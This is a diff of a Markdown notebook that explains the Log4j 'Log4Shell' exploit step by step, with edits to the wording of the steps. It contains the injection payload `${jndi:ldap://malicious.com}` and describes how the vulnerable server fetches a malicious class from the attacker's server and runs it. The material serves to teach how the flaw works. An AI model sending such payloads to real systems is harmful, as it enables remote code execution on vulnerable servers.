sourcegraph/sourcegraph-public-snapshot/log4j.snb.md

 1. Log4j will interpolate the value of `${jndi:ldap://malicious.com}` by using JNDI, a name lookup mechanism provided by the JDK, which in turn will attempt to resolve `ldap://malicious.com` by sending an LDAP request to the attacker's server.
 1. The attacker's server will send a response containing metadata that identifies a Java class and a URL pointing back to the attacker's server as the place from which to fetch the class.
 1. The vulnerable server fetches the class from the attacker's server.
-1. The attacker's server responds with a malicious class, which the vulnerable server then receives and runs.
+1. The attacker's server responds with a malicious class, which the vulnerable server then receives and instantiates in order to finish computing the interpolated value.

 Now for the deep dive into source code.
-We'll be walking through what happens at each step of the exploit in the following code:
+We'll be walking through what happens at each step of the exploit across the code of the vulnerable service, Log4j, the JDK, and the attacker's server:

-- An vulnerable web service that uses Log4j to log HTTP request metadata
-- A vulnerable version of Log4j (2.14)
-- A malicious server the attacker will direct the vulnerable service to make requests to

 ## Part 0: The vulnerable code